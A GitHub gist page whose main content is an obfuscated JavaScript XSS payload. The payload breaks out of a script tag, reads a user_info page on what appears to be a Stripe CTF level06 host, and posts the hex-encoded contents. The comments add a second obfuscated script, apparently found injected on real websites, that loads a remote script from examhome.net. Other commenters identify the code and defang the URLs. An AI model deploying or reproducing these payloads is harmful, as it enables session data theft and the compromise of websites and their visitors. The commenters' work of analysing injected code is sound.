Skip to content

Instantly share code, notes, and snippets.

@jonmarkgo

jonmarkgo/gist:3431818

Created August 23, 2012 03:18
Show Gist options
  • Save jonmarkgo/3431818 to your computer and use it in GitHub Desktop.
Save jonmarkgo/3431818 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.js
</script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 10, 36, 46, 103, 101, 116, 40, 39, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 118, 101, 108, 48, 54, 45, 50, 46, 115, 116, 114, 105, 112, 101, 45, 99, 116, 102, 46, 99, 111, 109, 47, 117, 115, 101, 114, 45, 116, 104, 107, 122, 115, 97, 108, 119, 110, 113, 47, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 100, 97, 116, 97, 41, 32, 123, 10, 32, 32, 36, 40, 39, 35, 116, 105, 116, 108, 101, 39, 41, 46, 118, 97, 108, 40, 39, 112, 97, 115, 115, 39, 41, 59, 10, 32, 32, 100, 97, 116, 97, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 116, 100, 47, 103, 44, 32, 34, 120, 116, 100, 120, 34, 41, 59, 10, 32, 32, 36, 40, 39, 35, 99, 111, 110, 116, 101, 110, 116, 39, 41, 46, 118, 97, 108, 40, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 36, 40, 100, 97, 116, 97, 41, 46, 102, 105, 110, 100, 40, 34, 120, 116, 100, 120, 34, 41, 46, 116, 101, 120, 116, 40, 41, 41, 41, 59, 10, 32, 32, 36, 40, 39, 35, 110, 101, 119, 95, 112, 111, 115, 116, 39, 41, 46, 115, 117, 98, 109, 105, 116, 40, 41, 59, 10, 125, 41, 59, 10, 125, 41))</script><script>
@chainchopper
Copy link

Found this string in a bit of malicious code on my site. pasted the entire thing in google and lead me right to this gist. Why?

@chainchopper
Copy link

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 57, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));

@hscale
Copy link

hscale commented Sep 23, 2018

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 57, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
Report him
https://github.com/contact/report-abuse?report=jonmarkgo+%28user%29

@ikaroony
Copy link

ikaroony commented Apr 5, 2023

Ran this through CyberChef, here's the defanged url:

hxxps[://]examhome[.]net/stat[.]js?v=1[.]0[.]1xamhome

I'm new to code analysis like this so idk if pasting the entire process of decoding this would be good, but here's the URL

@jonmarkgo
Copy link
Author

fwiw I'm pretty sure I pasted this here in a gist (11 years ago?) because I also found it in code on my site too and wanted to get feedback on wtf it was from other people

@ikaroony
Copy link

ikaroony commented Apr 5, 2023

fwiw I'm pretty sure I pasted this here in a gist (11 years ago?) because I also found it in code on my site too and wanted to get feedback on wtf it was from other people

that makes sense bc idk why someone actually infecting stuff with malicious code would post it on a personal github lmao
i might keep messing around with it tryna find an ip but that url should be good.
though im definitely not the first to find this. i found this snippet on one of mattnotmax 's cyberchef repos

@ikaroony
Copy link

ikaroony commented Apr 5, 2023
edited
Loading

another url
@jonmarkgo does this look familiar to something actually on your website? or is it a different url
defanged for your convenience
hxxps[://]level06-2[.]stripe-ctf[.]com/user-thkzsalwnq/user_info
edit: stripe ctf?? whys is that here

@jonmarkgo
Copy link
Author

I mean, the stripe CTF was an actual capture the flag challenge Stripe the company ran - no idea about that specific URL

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment